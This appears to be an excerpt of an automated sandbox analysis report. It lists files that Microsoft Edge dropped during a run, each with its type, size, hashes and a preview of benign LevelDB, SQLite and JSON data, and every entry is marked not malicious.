                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):524656
                                                                                                                                                                                                            Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:LsulQTlt:LsxTlt
                                                                                                                                                                                                            MD5:33880FF7D5DFCE56DA5F7BAE28361B6A
                                                                                                                                                                                                            SHA1:C9E48014CF632A0C713E65719C489D5092788C8D
                                                                                                                                                                                                            SHA-256:515B389BA5225DCD49E94B3F775D56D6920E0913E588CD01AC97EFF9CB29498D
                                                                                                                                                                                                            SHA-512:B771B597144B2B538237A4900CC71958176ABA2C7676E10AC6E59674740C110A10FC20BA2502C400B5EDBA655D6419577D266641A068F1F64E90848A8A043ECD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:............................................`./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):432
                                                                                                                                                                                                            Entropy (8bit):5.204098575258371
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:cFN+vYfYebvqBQFUt8J/+3+SNV5JfYebvqBvJ:xYfYebvZg80+EJfYebvk
                                                                                                                                                                                                            MD5:72D9838CD6103FA3A02891C3C631F988
                                                                                                                                                                                                            SHA1:0E75226A0F1EB447B5EB3B3A40AD831B7E09B33C
                                                                                                                                                                                                            SHA-256:79D327646E136BA9CCB8C65F17DC6897CB40CFAF426AF2D0BCDF3350F4285D7C
                                                                                                                                                                                                            SHA-512:468F1796AECFD30FDFA0211DE58BAD95E9624FE7398CDC4AB6C307B6305D3DDB3D81E612721EEE5D2BBE85AA3647AB61AB63422AB6F8DD466DDCC46D9B039F7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:10.332 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/13-07:27:10.334 101c Recovering log #3.2024/11/13-07:27:10.482 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):432
                                                                                                                                                                                                            Entropy (8bit):5.204098575258371
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:cFN+vYfYebvqBQFUt8J/+3+SNV5JfYebvqBvJ:xYfYebvZg80+EJfYebvk
                                                                                                                                                                                                            MD5:72D9838CD6103FA3A02891C3C631F988
                                                                                                                                                                                                            SHA1:0E75226A0F1EB447B5EB3B3A40AD831B7E09B33C
                                                                                                                                                                                                            SHA-256:79D327646E136BA9CCB8C65F17DC6897CB40CFAF426AF2D0BCDF3350F4285D7C
                                                                                                                                                                                                            SHA-512:468F1796AECFD30FDFA0211DE58BAD95E9624FE7398CDC4AB6C307B6305D3DDB3D81E612721EEE5D2BBE85AA3647AB61AB63422AB6F8DD466DDCC46D9B039F7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:10.332 101c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/13-07:27:10.334 101c Recovering log #3.2024/11/13-07:27:10.482 101c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                            Entropy (8bit):4.864047146590611
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                            MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                            SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                            SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                            SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                            Entropy (8bit):0.555790634850688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                            MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                            SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                            SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                            SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):326
                                                                                                                                                                                                            Entropy (8bit):5.140310830276409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavRfv4q2Pwkn23oH+TcwtpIFUt8YUavfZJZmw+YUavAL3DkwOwkn23oH+Tcwt7:3Vv4vYfYebmFUt8IxJ/+IAD5JfYebaUJ
                                                                                                                                                                                                            MD5:BC6177C07FA5AEA221DD316C3075B662
                                                                                                                                                                                                            SHA1:778B92D1BE202B0CFD0154AEEBAFFD55C9F5487D
                                                                                                                                                                                                            SHA-256:93E97951AC083B28ADBA916791CF43AC9D09EFA0742EE989CE538BFC0193A785
                                                                                                                                                                                                            SHA-512:7471AC80D9C280CE553ED6587D7114B977C3EAAE5F57E90B4708DFF9C3A2D1D8F3E3A55B472C4EB33C5F3ABF6409EA6BF0D9BC0646CDDDC00CA61119ACE28949
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.400 11f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/13-07:27:07.707 11f0 Recovering log #3.2024/11/13-07:27:07.708 11f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):326
                                                                                                                                                                                                            Entropy (8bit):5.140310830276409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUavRfv4q2Pwkn23oH+TcwtpIFUt8YUavfZJZmw+YUavAL3DkwOwkn23oH+Tcwt7:3Vv4vYfYebmFUt8IxJ/+IAD5JfYebaUJ
                                                                                                                                                                                                            MD5:BC6177C07FA5AEA221DD316C3075B662
                                                                                                                                                                                                            SHA1:778B92D1BE202B0CFD0154AEEBAFFD55C9F5487D
                                                                                                                                                                                                            SHA-256:93E97951AC083B28ADBA916791CF43AC9D09EFA0742EE989CE538BFC0193A785
                                                                                                                                                                                                            SHA-512:7471AC80D9C280CE553ED6587D7114B977C3EAAE5F57E90B4708DFF9C3A2D1D8F3E3A55B472C4EB33C5F3ABF6409EA6BF0D9BC0646CDDDC00CA61119ACE28949
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:07.400 11f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/13-07:27:07.707 11f0 Recovering log #3.2024/11/13-07:27:07.708 11f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                            Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                            MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                            SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                            SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                            SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 4, database pages 87, cookie 0x66, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):180224
                                                                                                                                                                                                            Entropy (8bit):0.9312584730793054
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CSqzyMUfTfnGCTjHbRJkkqtXaWTK+hGgH+6e7E:CrzyffrnzkkqtXnTK+hNH+5
                                                                                                                                                                                                            MD5:4ECC14F9549C4BB53159212C5BCC9CC0
                                                                                                                                                                                                            SHA1:EFEABE631F20B60E2863952BFF0F485BEB74CE36
                                                                                                                                                                                                            SHA-256:49F613160AD871F1B44381BB8F6B4E1EB481E41A86B462D4CD29CB90095EE149
                                                                                                                                                                                                            SHA-512:6EB988D5F9AA19A26EB1AE4E87F1D2E03D407B969777AB38E2031B3556D8915CCBD4BE6BD537A1A1D22A365D58CDF63E3B790D8AB7281DCCAC09F9685A0788C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ .......W...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2568
                                                                                                                                                                                                            Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:aI6ll/l1lhtlUY:adF3EY
                                                                                                                                                                                                            MD5:37A9006FFCB1A439AA0663E4CB27683E
                                                                                                                                                                                                            SHA1:DB1A12BCC3EFAF82B696DFF6BA703B708E2FB380
                                                                                                                                                                                                            SHA-256:3DE1ABFA1875162CC1228E329E62D983E0EEACA6ADCB008509EA1DF5E9A32B12
                                                                                                                                                                                                            SHA-512:5D1A1A17E33827A4F593D0617819F3D1A72D6A8CB01E7C8CB4B863C863F9EF6E575B5B294DCDF9D30BBF4881961FF3C9B583B45B5A9B93E458E9A98EC3413955
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:............S.....W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11417
                                                                                                                                                                                                            Entropy (8bit):5.237554345326078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                                                                                            MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                                                                                            SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                                                                                            SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                                                                                            SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):281
                                                                                                                                                                                                            Entropy (8bit):5.233305664986837
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUaKuM1wkn23oH+Tcwtfrl2KLlVUaNIpyq2Pwkn23oH+TcwtfrK+IFUv:CurfYeb1LdIpyvYfYeb23FUv
                                                                                                                                                                                                            MD5:9245E4442CA075B114603F81A7320C17
                                                                                                                                                                                                            SHA1:08A3DC5864AC79312BCD512DDADFA795F8096E10
                                                                                                                                                                                                            SHA-256:B46A3C530D6F23AB7F1462F2F7906C2EDFFF16103CEAE6F2F01992E53448C614
                                                                                                                                                                                                            SHA-512:9F2D4F97504B276813AA8CEF010A031DD1AAE4000ED8BC21CF9FB8E11120A462FF98565A346AF1D680D736612451E1B837D31B826708799004509F681B0E34D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:10.136 15c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2024/11/13-07:27:10.297 15c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                            Entropy (8bit):3.6995049215784723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:G0XttkJcsRwI9tkJcscml9t3moiOlfmEaHTltfmoI///fmEbn:G0Xtqcsqc9Ct3mxKm9HTl1mL//3m8
                                                                                                                                                                                                            MD5:D0D92D2ACC26306AEC6E8D67FD89BB1D
                                                                                                                                                                                                            SHA1:98C9F038C1C81881F5EB5E103530458845BCEEA9
                                                                                                                                                                                                            SHA-256:3B6E086A61E5DA0B64E80F593E648BD49FE77CE072098065399BE2B4F4F46840
                                                                                                                                                                                                            SHA-512:5464728663F1F62E9DBD7DF26D92FE7CC41B6BFDEE9021CEE5ED230B9F3114ACFF54768E5206B283382CBFF6999B07DF9283ED3DA50E04631729D22DD8E4CB5D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):297
                                                                                                                                                                                                            Entropy (8bit):5.179076219795944
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:HUahPWQERM1wkn23oH+Tcwtfrzs52KLlVUaf7iq2Pwkn23oH+TcwtfrzAdIFUv:gRrfYebs9LmvYfYeb9FUv
                                                                                                                                                                                                            MD5:9E892CA932DA41495E20146C0764FBCE
                                                                                                                                                                                                            SHA1:A4C8DA5A87624EB36C37100E4C65028F0E0E13BB
                                                                                                                                                                                                            SHA-256:461936060F3CDBF082538ACA79A621CBFFD5256F89D8A93BE77D747A873430DD
                                                                                                                                                                                                            SHA-512:C5B258B8ACCFF5AB26E351786ABCED8B489D36CF005F401B551A00EC865A21A32C33534F42F09A95A7ECA58357864B5A0DFB84AB59CCC21FADFBEEF60EF154D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:2024/11/13-07:27:09.963 d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2024/11/13-07:27:10.099 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
